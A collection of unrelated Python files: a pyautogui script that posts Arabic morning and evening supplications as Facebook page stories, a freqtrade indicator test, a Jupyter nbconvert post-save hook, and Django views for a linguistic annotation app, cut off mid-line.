إِلَٰهِ النَّاسِ* مِن شَرِّ الْوَسْوَاسِ الْخَنَّاسِ* الَّذِي يُوَسْوِسُ فِي صُدُورِ النَّاسِ* مِنَ الْجِنَّةِ وَالنَّاسِ) ثلاثا', 'قوله تعالى: (رَبِّ أَعُوذُ بِكَ مِنْ هَمَزَاتِ الشَّيَاطِينِ وَأَعُوذُ بِكَ رَبِّ أَنْ يَحْضُرُونِ)', 'قوله تعالى: (رَبِّ أَعُوذُ بِكَ مِنْ هَمَزَاتِ الشَّيَاطِينِ وَأَعُوذُ بِكَ رَبِّ أَنْ يَحْضُرُونِ)قوله تعالى: (حَسْبِيَ اللَّهُ لَا إِلَٰهَ إِلَّا هُوَ ۖ عَلَيْهِ تَوَكَّلْتُ ۖ وَهُوَ رَبُّ الْعَرْشِ الْعَظِيمِ).' ] # ======================================================================================================================================================================================================================================================================================================================================================= AzkharAlMasaa = [ 'اللَّهمَّ إنِّي عَبدُك، وابنُ عبدِك، وابنُ أمتِك، ناصِيَتي بيدِكَ، ماضٍ فيَّ حكمُكَ، عدْلٌ فيَّ قضاؤكَ، أسألُكَ بكلِّ اسمٍ هوَ لكَ سمَّيتَ بهِ نفسَك، أو أنزلْتَه في كتابِكَ، أو علَّمتَه أحدًا من خلقِك، أو استأثرتَ بهِ في علمِ الغيبِ عندَك، أن تجعلَ القُرآنَ ربيعَ قلبي، ونورَ صَدري، وجَلاءَ حَزَني، وذَهابَ هَمِّي', 'اللَّهمَّ إنِّي أسأَلُكَ مِن الخيرِ كلِّه عاجلِه وآجلِه ما علِمْتُ منه وما لَمْ أعلَمْ وأعوذُ بكَ مِن الشَّرِّ كلِّه عاجلِه وآجلِه ما علِمْتُ منه وما لَمْ أعلَمْ، اللَّهمَّ إنِّي أسأَلُكَ مِن الخيرِ ما سأَلكَ عبدُك ونَبيُّكَ وأعوذُ بكَ مِن الشَّرِّ ما عاذ به عبدُك ونَبيُّكَ وأسأَلُكَ الجنَّةَ وما قرَّب إليها مِن قولٍ وعمَلٍ وأعوذُ بكَ مِن النَّارِ وما قرَّب إليها مِن قولٍ وعمَلٍ وأسأَلُكَ أنْ تجعَلَ كلَّ قضاءٍ قضَيْتَه لي خيرًا', '(بسمِ اللهِ الذي لا يَضرُ مع اسمِه شيءٌ في الأرضِ ولا في السماءِ وهو السميعُ العليمِ)، وتُقال ثلاث مرات', 'رَضِيتُ بِاللهِ رَبًّا، وَبِالْإِسْلَامِ دِينًا، وَبِمُحَمَّدٍ صَلَّى اللهُ عَلَيْهِ وَسَلَّمَ نَبِيًّا وَرَسُولًا', 'اللَّهمَّ بِكَ أمسَينا وبِكَ أصبَحنا وبِكَ نحيا وبِكَ نموتُ وإليكَ المصير', 'اللَّهمَّ ما أمسى بي مِن نعمةٍ أو بأحَدٍ مِن خَلْقِكَ، فمنكَ وحدَكَ لا شريكَ لكَ، فلَكَ الحمدُ ولكَ الشُّكرُ، فقد أدى شُكْرَ ذلكَ اليومِ', 'سبحانَ اللَّهِ وبحمدِهِ وهي تُقال مئةَ مرَّةٍ', '(سُبْحَانَ اللهِ وَبِحَمْدِهِ، عَدَدَ خَلْقِهِ وَرِضَا نَفْسِهِ وَزِنَةَ عَرْشِهِ وَمِدَادَ كَلِمَاتِهِ)، وهي تُقال ثلاث مرات', 'اللَّهُمَّ إنِّي أمسيت أُشهِدُك، وأُشهِدُ حَمَلةَ عَرشِكَ، ومَلائِكَتَك، وجميعَ خَلقِكَ: أنَّكَ أنتَ اللهُ لا إلهَ إلَّا أنتَ، وأنَّ مُحمَّدًا عبدُكَ ورسولُكَ', 'اللَّهُمَّ صَلِّ عَلَى مُحَمَّدٍ وَعَلَى آلِ مُحَمَّدٍ، كَمَا صَلَّيْتَ عَلَى إِبْرَاهِيمَ وَعَلَى آلِ إِبْرَاهِيمَ، إِنَّكَ حَمِيدٌ مَجِيدٌ، اللَّهُمَّ بَارِكْ عَلَى مُحَمَّدٍ وَعَلَى آلِ مُحَمَّدٍ، كَمَا بَارَكْتَ عَلَى إِبْرَاهِيمَ وَعَلَى آلِ إِبْرَاهِيمَ، إِنَّكَ حَمِيدٌ مَجِيدٌ (مَن صلى عَلَيَّ حين يُصْبِحُ عَشْرًا ، وحين يُمْسِي عَشْرًا أَدْرَكَتْه شفاعتي يومَ القيامةِ)', 'لا إلهَ إلَّا اللهُ وحدَه لا شريكَ له له الملكُ وله الحمدُ وهو على كلِّ شيءٍ قديرٌ', 'أمسَيْنا على فِطرةِ الإسلامِ وعلى كَلِمةِ الإخلاصِ وعلى دينِ نبيِّنا محمَّدٍ صلَّى اللهُ عليه وسلَّم وعلى مِلَّةِ أبينا إبراهيمَ حنيفًا مسلمًا وما كان مِنَ المشركينَ', '(اللَّهمَّ عافِني في بدَني اللَّهمَّ عافِني في سمعي اللَّهمَّ عافِني في بصري لا إلهَ إلَّا أنت، اللَّهمَّ إنِّي أعوذُ بِكَ منَ الكُفْرِ والفقرِ اللَّهمَّ إنِّي أعوذُ بكَ من عذابِ القبرِ لا إلهَ إلَّا أنت) وتقال ثَلاثَ مرَّاتٍ', 'اللهم إنا نعوذُ بك من أن نُشرِكَ بك شيئًا نعلَمُه، و نستغفرُك لما لا نعلمُه', 'أستغفرُ اللهَ العظيمَ الذي لا إلهَ إلَّا هو الحيَّ القيومَ وأتوبُ إليه', 'اللَّهمَّ إنِّي أسألُكَ عِلمًا نافعًا ورزقًا طيِّبًا وعملًا متقبَّلًا', 'اللَّهمَّ إنِّي أسألُكَ عِلمًا نافعًا ورزقًا طيِّبًا وعملًا متقبَّلًايا حيُّ يا قيُّومُ، برَحمتِكَ أستَغيثُ، أصلِح لي شأني كُلَّهُ، ولا تَكِلني إلى نَفسي طرفةَ عينٍ', 'اللَّهمَّ عالِمَ الغَيبِ والشَّهادةِ، فاطرَ السَّمواتِ والأرضِ، رَبَّ كلِّ شيءٍ ومَليكَهُ، أشهدُ أن لا إلَهَ إلَّا أنتَ، أعوذُ بِكَ مِن شرِّ نفسي وشرِّ الشَّيطانِ وشِركِهِ', 'اللهمَّ فاطرَ السمواتِ والأرضِ، عالمَ الغيبِ والشهادةِ، لا إلهَ إلَّا أنتَ ربَّ كلِّ شيءٍ ومَليكَه، أعوذُ بك من شرِّ نفسي ومن شرِّ الشيطانِ وشرَكِه، وأنْ أقترفَ على نفسي سوءًا أو أجرَّهُ إلى مسلمٍ', 'اللهمَّ إنِّي أعوذُ بك من الهمِّ والحزنِ، والعجزِ والكسلِ، والبُخلِ والجُبنِ، وضَلَعِ الدَّينِ، وغَلَبَةِ الرجالِ', 'أعوذُ بكلماتِ اللهِ التَّامَّاتِ مِن شرِّ ما خلَق', 'اللهمَّ إني أسألُك العفوَ والعافيةَ، في الدنيا والآخرةِ، اللهمَّ إني أسألُك العفوَ والعافيةَ، في دِيني ودنيايَ وأهلي ومالي، اللهمَّ استُرْ عوراتي، وآمِنْ روعاتي، واحفظني من بين يدي، ومن خلفي، وعن يميني، وعن شمالي، ومن فوقي، وأعوذُ بك أن أُغْتَالَ من تحتي', 'أَمْسَيْنَا وَأَمْسَى المُلْكُ لِلَّهِ، وَالْحَمْدُ لِلَّهِ لا إلَهَ إلَّا اللَّهُ، وَحْدَهُ لا شَرِيكَ له، له المُلْكُ وَلَهُ الحَمْدُ وَهو علَى كُلِّ شيءٍ قَدِيرٌ، رَبِّ أَسْأَلُكَ خَيْرَ ما في هذِه اللَّيْلَةِ وَخَيْرَ ما بَعْدَهَا، وَأَعُوذُ بكَ مِن شَرِّ ما في هذِه اللَّيْلَةِ وَشَرِّ ما بَعْدَهَا، رَبِّ أَعُوذُ بكَ مِنَ الكَسَلِ وَسُوءِ الكِبَرِ، رَبِّ أَعُوذُ بكَ مِن عَذَابٍ في النَّارِ وَعَذَابٍ في القَبْرِ', 'اللَّهُمَّ أنْتَ رَبِّي لا إلَهَ إلَّا أنْتَ، خَلَقْتَنِي وأنا عَبْدُكَ، وأنا علَى عَهْدِكَ ووَعْدِكَ ما اسْتَطَعْتُ، أعُوذُ بكَ مِن شَرِّ ما صَنَعْتُ، أبُوءُ لكَ بنِعْمَتِكَ عَلَيَّ، وأَبُوءُ لكَ بذَنْبِي فاغْفِرْ لِي، فإنَّه لا يَغْفِرُ الذُّنُوبَ إلَّا أنْتَ', 'اللَّهمَّ إنِّي أسألُكَ خيرَ هذه الليلة فتحَها، ونصرَها، ونورَها، وبرَكتَها، وَهداها، وأعوذُ بِكَ من شرِّ ما فيها وشرِّ ما بعدَها', 'آية الكرسي: (اللَّهُ لَا إِلَٰهَ إِلَّا هُوَ الْحَيُّ الْقَيُّومُ ۚ لَا تَأْخُذُهُ سِنَةٌ وَلَا نَوْمٌ ۚ لَّهُ مَا فِي السَّمَاوَاتِ وَمَا فِي الْأَرْضِ ۗ مَن ذَا الَّذِي يَشْفَعُ عِندَهُ إِلَّا بِإِذْنِهِ ۚ يَعْلَمُ مَا بَيْنَ أَيْدِيهِمْ وَمَا خَلْفَهُمْ ۖ وَلَا يُحِيطُونَ بِشَيْءٍ مِّنْ عِلْمِهِ إِلَّا بِمَا شَاءَ ۚ وَسِعَ كُرْسِيُّهُ السَّمَاوَاتِ وَالْأَرْضَ ۖ وَلَا يَئُودُهُ حِفْظُهُمَا ۚ وَهُوَ الْعَلِيُّ الْعَظِيمُ)', "قال تعالى في سورة البقرة أيضاً: (آمَنَ الرَّسُولُ بِمَا أُنزِلَ إِلَيْهِ مِن رَّبِّهِ وَالْمُؤْمِنُونَ ۚ كُلٌّ آمَنَ بِاللَّهِ وَمَلَائِكَتِهِ وَكُتُبِهِ وَرُسُلِهِ لَا نُفَرِّقُ بَيْنَ أَحَدٍ مِّن رُّسُلِهِ ۚ وَقَالُوا سَمِعْنَا وَأَطَعْنَا ۖ غُفْرَانَكَ رَبَّنَا وَإِلَيْكَ الْمَصِيرُ*لَا يُكَلِّفُ اللَّهُ نَفْسًا إِلَّا وُسْعَهَا ۚ لَهَا مَا كَسَبَتْ وَعَلَيْهَا مَا اكْتَسَبَتْ ۗ رَبَّنَا لَا تُؤَاخِذْنَا إِن نَّسِينَا أَوْ أَخْطَأْنَا ۚ رَبَّنَا وَلَا تَحْمِلْ عَلَيْنَا إِصْرًا كَمَا حَمَلْتَهُ عَلَى الَّذِينَ مِن قَبْلِنَا ۚ رَبَّنَا وَلَا تُحَمِّلْنَا مَا لَا طَاقَةَ لَنَا بِهِ ۖ وَاعْفُ عَنَّا وَاغْفِرْ لَنَا وَارْحَمْنَا ۚ أَنتَ مَوْلَانَا فَانصُرْنَا عَلَى الْقَوْمِ الْكَافِرِينَ)", "سورة الإخلاص: (قُلْ هُوَ اللَّهُ أَحَدٌ* اللَّهُ الصَّمَدُ* لَمْ يَلِدْ وَلَمْ يُولَدْ* وَلَمْ يَكُن لَّهُ كُفُوًا أَحَدٌ) ثلاثا", 'سورة الفلق: (قُلْ أَعُوذُ بِرَبِّ الْفَلَقِ* مِن شَرِّ مَا خَلَقَ* وَمِن شَرِّ غَاسِقٍ إِذَا وَقَبَ* وَمِن شَرِّ النَّفَّاثَاتِ فِي الْعُقَدِ* وَمِن شَرِّ حَاسِدٍ إِذَا حَسَدَ) ثلاثا', 'سورة الناس: (قُلْ أَعُوذُ بِرَبِّ النَّاسِ* مَلِكِ النَّاسِ* إِلَٰهِ النَّاسِ* مِن شَرِّ الْوَسْوَاسِ الْخَنَّاسِ* الَّذِي يُوَسْوِسُ فِي صُدُورِ النَّاسِ* مِنَ الْجِنَّةِ وَالنَّاسِ) ثلاثا' ] def story(PageName, Text): pyautogui.moveTo(950, 300, duration=1) time.sleep(2) pyautogui.click() pyautogui.moveTo(900, 200, duration=1) time.sleep(2) pyautogui.click() pyautogui.write(PageName) time.sleep(2) pyautogui.moveTo(970, 270, duration=1) time.sleep(6) pyautogui.click() pyautogui.moveTo(1000, 500, duration=1) time.sleep(2) pyautogui.click() pyautogui.moveTo(150, 400, duration=1) time.sleep(2) pyautogui.click() # Store our string to the clipboard pyperclip.copy(Text) # Hotkey the paste command pyautogui.hotkey("ctrl", "v") pyautogui.moveTo(250, 700, duration=1) time.sleep(2) pyautogui.click() x = int(input('Enter the type (0 for test, 1 for AzkharAlsabah, 2 for AzkharAlMasaa): ')) if x == 0: webbrowser.open_new('https://business.facebook.com/creatorstudio/home') time.sleep(10) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlsabah Done on {datetime.datetime.now().time()}✔') elif x == 1: webbrowser.open_new('https://business.facebook.com/creatorstudio/home') time.sleep(10) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlsabah Starts') for i in AzkharAlsabah: story('apocryphon', i) time.sleep(2) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlsabah Done on {datetime.datetime.now().time()}✔') elif x == 2: webbrowser.open_new('https://business.facebook.com/creatorstudio/home') time.sleep(10) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlMasaa Starts') for i in AzkharAlMasaa: story('apocryphon', i) time.sleep(2) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlMasaa Done on {datetime.datetime.now().time()}✔')
nilq/baby-python
python
import numpy as np import pandas as pd import freqtrade.vendor.qtpylib.indicators as qtpylib def test_crossed_numpy_types(): """ This test is only present since this method currently diverges from the qtpylib implementation. And we must ensure to not break this again once we update from the original source. """ series = pd.Series([56, 97, 19, 76, 65, 25, 87, 91, 79, 79]) expected_result = pd.Series([False, True, False, True, False, False, True, False, False, False]) assert qtpylib.crossed_above(series, 60).equals(expected_result) assert qtpylib.crossed_above(series, 60.0).equals(expected_result) assert qtpylib.crossed_above(series, np.int32(60)).equals(expected_result) assert qtpylib.crossed_above(series, np.int64(60)).equals(expected_result) assert qtpylib.crossed_above(series, np.float64(60.0)).equals(expected_result)
nilq/baby-python
python
import os import subprocess def export_script_and_view(model, os_path, contents_manager): if model["type"] != "notebook": return dir_name, file_name = os.path.split(os_path) file_base, file_ext = os.path.splitext(file_name) if file_base.startswith("Untitled"): return export_name = file_base if file_ext == ".ipynb" else file_name subprocess.check_call(["jupyter", "nbconvert", "--to", "script", file_name, "--output", export_name + "_script"], cwd=dir_name) subprocess.check_call(["jupyter", "nbconvert", "--to", "html", file_name, "--output", export_name + "_view"], cwd=dir_name) c.FileContentsManager.post_save_hook = export_script_and_view
nilq/baby-python
python
import os from collections import defaultdict from tempfile import NamedTemporaryFile from django.conf import settings from django.contrib import messages from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin from django.contrib.messages.views import SuccessMessageMixin from django.core.exceptions import PermissionDenied from django.db.models import Count, Prefetch, QuerySet from django.http import HttpResponse, JsonResponse, QueryDict from django.shortcuts import get_object_or_404 from django.template.loader import render_to_string from django.urls import reverse from django.utils.http import urlquote from django.views import generic from django_filters.views import FilterView from lxml import etree from reversion.models import Version from reversion.revisions import add_to_revision, set_comment from reversion.views import RevisionMixin from core.mixins import ImportMixin, CheckOwnerOrStaff, FluidMixin, SuperuserRequiredMixin, LimitedPublicAccessMixin from core.utils import find_in_enum, XLSX from .exports import export_annotations from .filters import AnnotationFilter from .forms import AnnotationForm, LabelImportForm, AddFragmentsForm, FragmentForm from .mixins import PrepareDownloadMixin, SelectSegmentMixin, ImportFragmentsMixin from .models import Corpus, SubCorpus, Document, Language, Fragment, Alignment, Annotation, \ TenseCategory, Tense, Source, Sentence, Word, LabelKey from .utils import get_next_alignment, get_available_corpora, get_xml_sentences, bind_annotations_to_xml, \ natural_sort_key ############## # Static views ############## class IntroductionView(generic.TemplateView): """ Loads a static introduction view. """ template_name = 'annotations/introduction.html' class InstructionsView(generic.TemplateView): """ Loads the various steps of the instructions. """ def get_template_names(self): return 'annotations/instructions{}.html'.format(self.kwargs['n']) def get_context_data(self, **kwargs): context = super(InstructionsView, self).get_context_data(**kwargs) context['is_no_target_title'] = Annotation._meta.get_field('is_no_target').verbose_name.format( 'present perfect') context['is_translation_title'] = Annotation._meta.get_field('is_translation').verbose_name return context class StatusView(PermissionRequiredMixin, generic.TemplateView): """ Loads a static home view, with an overview of the annotation progress. """ template_name = 'annotations/home.html' permission_required = 'annotations.change_annotation' def get_context_data(self, **kwargs): """Creates a list of tuples with information on the annotation progress.""" context = super(StatusView, self).get_context_data(**kwargs) corpus_pk = self.kwargs.get('pk', None) if corpus_pk: corpora = [get_object_or_404(Corpus, pk=corpus_pk)] else: corpora = get_available_corpora(self.request.user) # Retrieve the totals per language pair languages = {language.pk: language for language in Language.objects.all()} alignments = Alignment.objects.filter(original_fragment__document__corpus__in=corpora) totals = alignments \ .values('original_fragment__language', 'translated_fragment__language') \ .order_by('original_fragment__language', 'translated_fragment__language') \ .annotate(count=Count('pk')) completed = {(t.get('original_fragment__language'), t.get('translated_fragment__language')): t.get('count') for t in totals.exclude(annotation=None)} # Convert the QuerySets into a list of tuples language_totals = [] for total in totals: l1 = languages.get(total['original_fragment__language']) l2 = languages.get(total['translated_fragment__language']) complete = completed.get((l1.pk, l2.pk), 0) available = total['count'] language_totals.append((l1, l2, complete, available)) context['languages'] = language_totals context['corpus_pk'] = corpus_pk context['current_corpora'] = corpora return context ################# # CRUD Annotation ################# class AnnotationMixin(SelectSegmentMixin, SuccessMessageMixin, PermissionRequiredMixin): model = Annotation form_class = AnnotationForm permission_required = 'annotations.change_annotation' def __init__(self): """Creates an attribute to cache the Alignment.""" super(AnnotationMixin, self).__init__() self.alignment = None def get_form_kwargs(self): """Sets the User and the Alignment as a form kwarg.""" kwargs = super(AnnotationMixin, self).get_form_kwargs() kwargs['user'] = self.request.user kwargs['alignment'] = self.get_alignment() kwargs['select_segment'] = self.request.session.get('select_segment', False) return kwargs def get_context_data(self, **kwargs): """Sets the Alignment on the context.""" context = super(AnnotationMixin, self).get_context_data(**kwargs) context['alignment'] = self.get_alignment() return context def get_alignment(self): raise NotImplementedError def get_alignments(self): """Retrieve related fields on Alignment to prevent extra queries.""" return Alignment.objects \ .select_related('original_fragment__document__corpus', 'translated_fragment__document__corpus') \ .prefetch_related('original_fragment__sentence_set__word_set', 'translated_fragment__sentence_set__word_set') class RevisionWithCommentMixin(RevisionMixin): revision_manage_manually = True def form_valid(self, form): result = super().form_valid(form) if form.changed_data: add_to_revision(self.object) set_comment(self.format_change_comment(form.changed_data, form.cleaned_data)) return result def format_change_for_field(self, field, value): if isinstance(value, QuerySet): value = ', '.join(map(str, value)) return '{} to "{}"'.format(field, value) def format_change_comment(self, changes, values): parts = [] for change in changes: parts.append(self.format_change_for_field(change, values[change])) return 'Changed {}'.format(', '.join(parts)) def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context['revisions'] = Version.objects.get_for_object(self.object) return context class RevisionCreateMixin(RevisionMixin): def form_valid(self, form): set_comment('Created annotation') return super().form_valid(form) class AnnotationUpdateMixin(AnnotationMixin, CheckOwnerOrStaff, RevisionWithCommentMixin): def get_context_data(self, **kwargs): """Sets the annotated Words on the context.""" context = super(AnnotationUpdateMixin, self).get_context_data(**kwargs) context['annotated_words'] = self.object.words.all() return context def get_success_url(self): """Returns to the overview per language.""" alignment = self.get_alignment() l1 = alignment.original_fragment.language.iso l2 = alignment.translated_fragment.language.iso return reverse('annotations:list', args=(l1, l2,)) def get_alignment(self): """Retrieves the Alignment from the object.""" if not self.alignment: self.alignment = self.get_alignments().get(pk=self.object.alignment.pk) return self.alignment class AnnotationCreate(AnnotationMixin, RevisionCreateMixin, generic.CreateView): success_message = 'Annotation created successfully' def get_success_url(self): """Go to the choose-view to select a new Alignment.""" alignment = self.object.alignment return reverse('annotations:choose', args=(alignment.original_fragment.document.corpus.pk, alignment.original_fragment.language.iso, alignment.translated_fragment.language.iso)) def form_valid(self, form): """Sets the User and Alignment on the created instance.""" form.instance.annotated_by = self.request.user form.instance.alignment = self.get_alignment() return super(AnnotationCreate, self).form_valid(form) def get_alignment(self): """Retrieves the Alignment by the pk in the kwargs.""" if not self.alignment: self.alignment = get_object_or_404(self.get_alignments(), pk=self.kwargs['pk']) return self.alignment class AnnotationUpdate(AnnotationUpdateMixin, generic.UpdateView): success_message = 'Annotation edited successfully' def form_valid(self, form): """Sets the last modified by on the instance.""" form.instance.last_modified_by = self.request.user return super(AnnotationUpdate, self).form_valid(form) class AnnotationDelete(AnnotationUpdateMixin, generic.DeleteView): success_message = 'Annotation deleted successfully' class AnnotationChoose(PermissionRequiredMixin, generic.RedirectView): permanent = False pattern_name = 'annotations:create' permission_required = 'annotations.change_annotation' def get_redirect_url(self, *args, **kwargs): """Redirects to the next open Alignment.""" l1 = Language.objects.get(iso=self.kwargs['l1']) l2 = Language.objects.get(iso=self.kwargs['l2']) corpus = Corpus.objects.get(pk=int(self.kwargs['corpus'])) if 'corpus' in self.kwargs else None next_alignment = get_next_alignment(self.request.user, l1, l2, corpus) # If no next Alignment has been found, redirect to the status overview if not next_alignment: messages.success(self.request, 'All work is done for this language pair!') return reverse('annotations:status') corpus_pk = next_alignment.original_fragment.document.corpus.pk return super().get_redirect_url(corpus_pk, next_alignment.pk) ############ # CRUD Fragment ############ class FragmentDetailMixin(generic.DetailView): model = Fragment def get_object(self, queryset=None): qs = Fragment.objects \ .select_related('document__corpus', 'language', 'tense') \ .prefetch_related('original', 'sentence_set__word_set') fragment = super().get_object(qs) if fragment.document.corpus not in get_available_corpora(self.request.user): raise PermissionDenied referer_url = self.request.headers.get('referer', '') allowed_referers = referer_url.endswith((reverse('stats:fragment_table'), reverse('stats:fragment_table_mds'))) if not (self.request.user.is_authenticated or allowed_referers): raise PermissionDenied return fragment class FragmentDetail(LimitedPublicAccessMixin, FragmentDetailMixin): def get_context_data(self, **kwargs): context = super(FragmentDetail, self).get_context_data(**kwargs) fragment = self.object limit = 5 # TODO: magic number doc_sentences = get_xml_sentences(fragment, limit) context['sentences'] = doc_sentences or fragment.sentence_set.all() context['limit'] = limit context['public_languages'] = settings.PUBLIC_FRAG_LANG_IDS return context class FragmentDetailPlain(LoginRequiredMixin, FragmentDetailMixin): template_name = 'annotations/fragment_detail_plain.html' class FragmentRevisionWithCommentMixin(RevisionWithCommentMixin): def format_change_for_field(self, field, value): if field == 'formal_structure': return 'formal structure to ' + find_in_enum(value, Fragment.FORMAL_STRUCTURES) if field == 'sentence_function': return 'sentence function to ' + find_in_enum(value, Fragment.SENTENCE_FUNCTIONS) return super().format_change_for_field(field, value) class FragmentEdit(SelectSegmentMixin, LoginRequiredMixin, FragmentRevisionWithCommentMixin, generic.UpdateView): model = Fragment form_class = FragmentForm def get_context_data(self, **kwargs): """Sets the annotated Words on the context.""" context = super(FragmentEdit, self).get_context_data(**kwargs) context['annotated_words'] = self.object.targets() return context def get_success_url(self): return reverse('annotations:show', args=(self.object.pk,)) def form_valid(self, form): """Updates the target words.""" for word in Word.objects.filter(sentence__fragment=self.object): word.is_target = word in form.cleaned_data['words'] word.save() return super(FragmentEdit, self).form_valid(form) ############ # CRUD Corpus ############ class CorpusList(LoginRequiredMixin, generic.ListView): model = Corpus context_object_name = 'corpora' ordering = 'title' class CorpusDetail(LoginRequiredMixin, generic.DetailView): model = Corpus def get_context_data(self, **kwargs): context = super(CorpusDetail, self).get_context_data(**kwargs) # Retrieve all Documents and order them by title corpus = self.object documents = {d.pk: d.title for d in corpus.documents.all()} documents_sorted = sorted(list(documents.items()), key=lambda x: natural_sort_key(x[1])) document_pks = [d[0] for d in documents_sorted] # Create a list of Languages languages = defaultdict(list) for language in corpus.languages.all(): languages[language.title] = [None] * len(document_pks) # Retrieve the number of Annotations per document by_document = Annotation.objects. \ filter(alignment__translated_fragment__document__corpus=corpus). \ values('alignment__translated_fragment__language__title', 'alignment__translated_fragment__document__pk'). \ annotate(Count('pk')) # Wrap the number of Annotations into the list of Languages for d in by_document: language = d.get('alignment__translated_fragment__language__title') document_pk = d.get('alignment__translated_fragment__document__pk') # Additional sanity check: # happens if the language is not defined as a Corpus language, but nevertheless Annotations exist. if languages.get(language): index = document_pks.index(document_pk) languages[language][index] = d.get('pk__count') # And finally, append the list of Document and Languages to the context context['documents'] = documents_sorted context['languages'] = dict(languages) return context ############ # CRUD Document ############ class DocumentDetail(LoginRequiredMixin, generic.DetailView): model = Document ############ # CRUD Source ############ class SourceDetail(LoginRequiredMixin, generic.DetailView): model = Source def get_object(self, queryset=None): qs = Source.objects.select_related('document__corpus', 'language') source = super(SourceDetail, self).get_object(qs) return source def get_context_data(self, **kwargs): context = super(SourceDetail, self).get_context_data(**kwargs) source = self.object tree, failed_lookups = bind_annotations_to_xml(source) additional_sources = Source.objects \ .filter(document=source.document) \ .exclude(pk=source.pk) \ .select_related('language') transform = etree.XSLT(etree.fromstring(render_to_string('annotations/xml_transform.xslt').encode('utf-8'))) context['sentences'] = [transform(p) for p in tree.iter('p', 'head')] context['failed_lookups'] = failed_lookups context['additional_sources'] = additional_sources context['rows'] = [(x,) for x in context['sentences']] additional_source = self.request.GET.get('additional_source') if additional_source: source = get_object_or_404(Source, pk=additional_source) add_tree, add_failed_lookups = bind_annotations_to_xml(source) context['additional_source'] = source context['additional_sentences'] = [transform(p) for p in add_tree.iter('p', 'head')] context['failed_lookups'] = context['failed_lookups'].extend(add_failed_lookups) context['rows'] = zip(context['sentences'], context['additional_sentences']) return context ############ # List views ############ class AnnotationList(PermissionRequiredMixin, FluidMixin, FilterView): context_object_name = 'annotations' filterset_class = AnnotationFilter paginate_by = 15 permission_required = 'annotations.change_annotation' def get_queryset(self): """ Retrieves all Annotations for the given source (l1) and target (l2) language. :return: A QuerySet of Annotations. """ target_words = Sentence.objects. \ prefetch_related(Prefetch('word_set', queryset=Word.objects.filter(is_target=True))) return Annotation.objects \ .filter(alignment__original_fragment__language__iso=self.kwargs['l1']) \ .filter(alignment__translated_fragment__language__iso=self.kwargs['l2']) \ .filter(alignment__original_fragment__document__corpus__in=get_available_corpora(self.request.user)) \ .select_related('annotated_by', 'tense', 'alignment__original_fragment', 'alignment__original_fragment__document', 'alignment__original_fragment__tense', 'alignment__translated_fragment') \ .prefetch_related('alignment__original_fragment__sentence_set__word_set', Prefetch('alignment__original_fragment__sentence_set', queryset=target_words, to_attr='targets_prefetched'), 'alignment__translated_fragment__sentence_set__word_set', 'alignment__original_fragment__labels', 'labels', 'words') \ .order_by('-annotated_at') def get_filterset(self, filterset_class): kwargs = self.get_filterset_kwargs(filterset_class) request = kwargs['request'] l1, l2 = request.resolver_match.kwargs['l1'], request.resolver_match.kwargs['l2'] session_key = 'annotation_filter_{}_{}'.format(l1, l2) if kwargs['data']: request.session[session_key] = kwargs['data'].urlencode() elif session_key in request.session: kwargs['data'] = QueryDict(request.session[session_key]) return filterset_class(l1, l2, **kwargs) class FragmentList(PermissionRequiredMixin, generic.ListView): """ TODO: consider refactoring, too many queries. """ context_object_name = 'fragments' template_name = 'annotations/fragment_list.html' paginate_by = 25 permission_required = 'annotations.change_annotation' def get_queryset(self): """ Retrieves all Fragments for the given language that have an Annotation that contains a target expression. :return: A list of Fragments. """ results = [] fragments = Fragment.objects.filter(language__iso=self.kwargs['language']) \ .filter(document__corpus__in=get_available_corpora(self.request.user)) for fragment in fragments: if Annotation.objects.filter(alignment__original_fragment=fragment, is_no_target=False).exists(): results.append(fragment) if len(results) == 50: # TODO: Capping this for now with a magic number. break return results def get_context_data(self, **kwargs): """ Sets the current language and other_languages on the context. :param kwargs: Contains the current language. :return: The context variables. """ context = super(FragmentList, self).get_context_data(**kwargs) language = self.kwargs['language'] corpus = context['fragments'][0].document.corpus context['language'] = Language.objects.filter(iso=language) context['other_languages'] = corpus.languages.exclude(iso=language) context['show_tenses'] = self.kwargs.get('showtenses', False) return context class TenseCategoryList(PermissionRequiredMixin, FluidMixin, generic.ListView): model = TenseCategory context_object_name = 'tensecategories' template_name = 'annotations/tenses.html' permission_required = 'annotations.change_annotation' def get_context_data(self, **kwargs): """ Sets the tenses and languages on the context. :return: The context variables. """ context = super(TenseCategoryList, self).get_context_data(**kwargs) tense_cache = {(t.category.title, t.language.iso): t.title for t in Tense.objects.select_related('category', 'language')} tense_categories = TenseCategory.objects.all() tenses = defaultdict(list) languages = [] for language in Language.objects.order_by('iso'): if not Tense.objects.filter(language=language): continue languages.append(language) for tc in tense_categories: tense = tense_cache.get((tc.title, language.iso), '') tenses[tc].append(tense) context['tenses'] = sorted(list(tenses.items()), key=lambda item: item[0].pk) context['languages'] = languages return context class LabelList(PermissionRequiredMixin, FluidMixin, generic.ListView): model = LabelKey context_object_name = 'labelkeys' template_name = 'annotations/labels.html' permission_required = 'annotations.change_annotation' def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) corpus = self.kwargs.get('corpus') if corpus: corpus = Corpus.objects.get(pk=corpus) else: corpus = get_available_corpora(self.request.user)[0] self.object_list = self.object_list.filter(corpora=corpus) context['label_keys'] = self.object_list labels = [key.labels.all() for key in self.object_list] # transpose the 2d array stored in labels so that we could have each label key # show in a column on the html table transposed = [] max_len = max([len(x) for x in labels]) if labels else 0 for i in range(max_len): transposed.append([]) for group in labels: if len(group) > i: transposed[-1].append(group[i]) else: # add empty table cells transposed[-1].append('') context['labels'] = transposed context['corpus'] = corpus context['corpora'] = get_available_corpora(self.request.user) return context ############## # Export views ############## class PrepareDownload(PrepareDownloadMixin, generic.TemplateView): template_name = 'annotations/download.html' class ExportPOSPrepare(PermissionRequiredMixin, generic.View): permission_required = 'annotations.change_annotation' def get(self, request, *args, **kwargs): language = self.request.GET['language'] corpus_id = self.request.GET['corpus'] subcorpus_id = self.request.GET['subcorpus'] document_id = self.request.GET['document'] include_non_targets = 'include_non_targets' in self.request.GET add_lemmata = 'add_lemmata' in self.request.GET pos_file = NamedTemporaryFile(delete=False) self.request.session['pos_file'] = pos_file.name corpus = Corpus.objects.get(pk=int(corpus_id)) subcorpus = 